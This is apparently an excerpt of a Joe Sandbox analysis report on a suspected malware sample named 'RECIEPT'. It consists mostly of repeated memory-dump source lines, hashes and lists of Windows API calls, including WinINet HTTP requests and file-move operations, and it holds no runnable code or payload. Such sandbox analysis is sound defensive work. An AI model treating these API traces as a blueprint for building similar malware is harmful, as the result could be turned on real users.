                                        • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                        APIs
                                        • CreateMenu.USER32 ref: 00448603
                                        • SetMenu.USER32(?,00000000), ref: 00448613
                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                        • IsMenu.USER32(?), ref: 004486AB
                                        • CreatePopupMenu.USER32 ref: 004486B5
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                        • DrawMenuBar.USER32 ref: 004486F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                        • String ID: 0
                                        • API String ID: 161812096-4108050209
                                        • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                        • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                        • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                        • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                        • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                        • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                        • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                        • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                        • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                        • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                        APIs
                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                        • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                        • MoveFileW.KERNEL32(?,?), ref: 00453932
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                        • String ID:
                                        • API String ID: 978794511-0
                                        • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                        • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                        • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                        • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                        • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                        • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                        • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                        • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                        • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                        • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove$_memcmp
                                        • String ID: '$\$h
                                        • API String ID: 2205784470-1303700344
                                        • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                        • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                        • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                        • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                        APIs
                                        • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                        • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                        • VariantClear.OLEAUT32 ref: 0045EA6D
                                        • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                        • __swprintf.LIBCMT ref: 0045EC33
                                        • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                        Strings
                                        • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                        • String ID: %4d%02d%02d%02d%02d%02d
                                        • API String ID: 2441338619-1568723262
                                        • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                        • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                        • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                        • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                        APIs
                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                        • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                        • String ID: @COM_EVENTOBJ
                                        • API String ID: 327565842-2228938565
                                        • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                        • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                        • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                        • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                        APIs
                                        • VariantClear.OLEAUT32(?), ref: 0047031B
                                        • VariantClear.OLEAUT32(?), ref: 0047044F
                                        • VariantInit.OLEAUT32(?), ref: 004704A3
                                        • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                        • VariantClear.OLEAUT32(?), ref: 00470516
                                          • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                        • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                          • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                        • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Variant$Clear$Copy$CallDispFuncInit
                                        • String ID: H
                                        • API String ID: 3613100350-2852464175
                                        • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                        • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                        • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                        • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                        • String ID:
                                        • API String ID: 1291720006-3916222277
                                        • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                        • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                        • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                        • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                        • IsMenu.USER32(?), ref: 0045FC5F
                                        • CreatePopupMenu.USER32 ref: 0045FC97
                                        • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                        • String ID: 0$2
                                        • API String ID: 93392585-3793063076
                                        • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                        • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                        • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                        • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                        APIs
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                        • VariantClear.OLEAUT32(?), ref: 00435320
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                        • VariantClear.OLEAUT32(?), ref: 004353B3
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                        • String ID: crts
                                        • API String ID: 586820018-3724388283
                                        • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                        • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                        • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                        • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                        APIs
                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                        • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                        • _wcscat.LIBCMT ref: 0044BCAF
                                        • _wcslen.LIBCMT ref: 0044BCBB
                                        • _wcslen.LIBCMT ref: 0044BCD1
                                        • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 2326526234-1173974218
                                        • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                        • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                        • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                        • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                        APIs
                                          • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                        • _wcslen.LIBCMT ref: 004335F2
                                        • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                        • GetLastError.KERNEL32 ref: 0043362B
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                        • _wcsrchr.LIBCMT ref: 00433666
                                          • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                        • String ID: \
                                        • API String ID: 321622961-2967466578
                                        • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                        • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                        • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                        • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
